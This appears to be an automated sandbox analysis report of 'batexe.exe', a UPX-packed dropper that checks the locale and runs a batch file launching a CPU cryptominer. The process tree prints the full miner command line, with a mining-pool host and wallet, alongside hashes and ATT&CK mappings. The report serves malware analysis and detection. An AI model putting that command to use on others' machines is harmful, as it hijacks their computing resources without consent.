73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
300s
max time network
299s
platform
windows10-2004_x64
resource
win10v2004-20240221-ja
resource tags

arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
24/02/2024, 13:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
3276	b2e.exe
5680	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
5680	cpuminer-sse2.exe
5680	cpuminer-sse2.exe
5680	cpuminer-sse2.exe
5680	cpuminer-sse2.exe
5680	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1372-8-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1372 wrote to memory of 3276	1372	batexe.exe	92
PID 1372 wrote to memory of 3276	1372	batexe.exe	92
PID 1372 wrote to memory of 3276	1372	batexe.exe	92
PID 3276 wrote to memory of 5284	3276	b2e.exe	93
PID 3276 wrote to memory of 5284	3276	b2e.exe	93
PID 3276 wrote to memory of 5284	3276	b2e.exe	93
PID 5284 wrote to memory of 5680	5284	cmd.exe	96
PID 5284 wrote to memory of 5680	5284	cmd.exe	96

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1372
- C:\Users\Admin\AppData\Local\Temp\54F6.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\54F6.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\54F6.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3276
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\58BF.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5284
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:5680

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\54F6.tmp\b2e.exe

Filesize
4.6MB

MD5
7d4960c81abe03c62951a979f5307653

SHA1
86934142c25bc84e622d203ee40a241e471455b9

SHA256
8f8e5a0108ea1dfbbfe4c48c9f3745044440198eaca00d5471b8645a42e9d219

SHA512
32cdcac60b97bf9f36248f1a0d00a9cb13bef0a1cb17864664878216ef67fb6b7dbf5d454a9a5744543501985faed93b73e72f0e6a05021201444976424d7a2b

Download Submit
C:\Users\Admin\AppData\Local\Temp\54F6.tmp\b2e.exe

Filesize
3.7MB

MD5
bcfd2ba748d20c8907daedeec19bd32b

SHA1
6ac9769a6179db6646e0dcccadc6bbabed1bf477

SHA256
b45e169df157ee8f7e21f223c209df4d1ad53e5a497b8cb3b4494567eb914577

SHA512
1b7b24d1eba84bf004d8e6da517df9499e17e24572817edbc4d4b8eaf24004ab54bf7ffcd6b84f96f279e543ea80c6852df79629e8694af45fce4f94da78d030

Download Submit
C:\Users\Admin\AppData\Local\Temp\54F6.tmp\b2e.exe

Filesize
3.3MB

MD5
7ad4bc560bc93e9d46ce80354e8d6703

SHA1
a7e922aeedcc8c14d2a4ecc5386a7c56f403a3b9

SHA256
22dbfb265d61d07cbfe4fd14352b3f01a49472304a84f28b319cd7ce303ee924

SHA512
208d6c8aa0dc4360e7d87ef3af46e2f7b5aa9db8f24e4e5e66e17663360a456209ba60a006d8c5dac69d2d55d90c6fc0dec7aa1bc8794a1fee1b69d56728c448

Download Submit
C:\Users\Admin\AppData\Local\Temp\58BF.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
773KB

MD5
eee1f147c1a2918b9bc130e141248a23

SHA1
bd763d58d8467d49aa036cd2b9759591768df5a6

SHA256
7808765535a2db9491b646c7b8ce904bac8e8d8d686a1306e8a791df1e76b98d

SHA512
98019d3d99bb463aec0f8af14000ccab58b67336465744b442110f798a2b66b135f14102877cf3fa9a0592242e36a590f8a12adcc630ebdf6337f0ac1b5a3c6d

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
907KB

MD5
e7ea8d2e3aa4767e6726404e1f8eba13

SHA1
a0ee5e00fa186601d8ab93c852afce46ca703652

SHA256
3c672190955f0fef842656f4b96cc55e72e5408e2f71cf0e7395ad13d9b0eb49

SHA512
5a5777823d9e7153c40c2ec4553e742709be914ccebe339b02e4f9815ace16c16f7b3b473551e57bc53c07b4928b8c5b840c4ab44e2edbbc1efde2beb873e5c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
724KB

MD5
4dd6b6b08779cc3be9e9c2f95fb6f91d

SHA1
f8a91d114648f0c7f34c1872a762443dd4a8c8c0

SHA256
90f85e1cc9afa4d2b421dae5c88c929eda0c40ff1b2ae81401309a8c05d55b2c

SHA512
966d79a191bdb91f2d3c2e6c9b81e49240fe7ae626b08cb61e0604a3bf4e90cbfb591f7441514fdfb1eadcea39f7a3416b71d8d2a31072edb4092330a6bda7db

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
789KB

MD5
b10501a8f5919428cdcab89829579442

SHA1
703b3ba036d9dfe0dea57a93a42af10ff6ee75e5

SHA256
a8e3afe6c5d7db57e538fbf8febd2001454a9c0cd2f591162f1f4953c245f8e1

SHA512
65303f8d12e8f085a358dca780dd8f31f3bd78cfb3bd4f4fc314ae1a9d97b0db8dbf6c4a40627106135e1c07fd22a3f73c1e4759509c4ec965a8dc790d6c5b86

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.0MB

MD5
a4f1b6ab7ad35e10c4806c2d96ae528b

SHA1
83f19e44e1fc81dc0bcce35fc90078a7908149d3

SHA256
24d10f062ea5acbee9014478a3e5ea53d3d27331cf28d2f83393ca46ff2767ac

SHA512
00181603e8ea050840c3aae829c7cbed7f9faefc606dfa8c57644bbd9ede42c101140e1e3a76e5462e210f2b98bc6cb3551911dda60ed4a11fc63b4e38f7c1a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
504KB

MD5
a4cb1521e32754918898bb071df25949

SHA1
0624c06d0819e6ee1cdc1410f10d833f10b127ff

SHA256
ea90e3181c4a88498c709f73715660913c51b0c0bfc13d40df1b1ab41e0acebf

SHA512
db55c2598fa033c55758af4b350fa7c63102b9d64aca8401be52391b1eef6de050b93898f6c0d01d0a65039f1605279a790841b308d7a7b0290c2e73377527d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
630KB

MD5
3ea11cac1fe53f5ae2d787471553d98a

SHA1
aa5feecc2d6e037d0ef2ad4a471b44b2effbe604

SHA256
afe73bb2659dcc333451858d0b909b2dcfaca4aea89942f6a6a6f661e75d06ac

SHA512
4066a0754809fb6a2172d0542be1a353da4e35e24bb68ceb3cc72aea9f598b762dd7ec19a93aca28649664a912505d2f5f5e03cb73681f552e8d6844f86775f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/1372-8-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/3276-7-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3276-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/5680-47-0x0000000001100000-0x00000000029B5000-memory.dmp

Filesize
24.7MB

Download
memory/5680-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5680-44-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/5680-46-0x000000006D560000-0x000000006D5F8000-memory.dmp

Filesize
608KB

Download
memory/5680-49-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/5680-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5680-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5680-45-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/5680-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5680-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5680-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5680-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5680-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5680-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download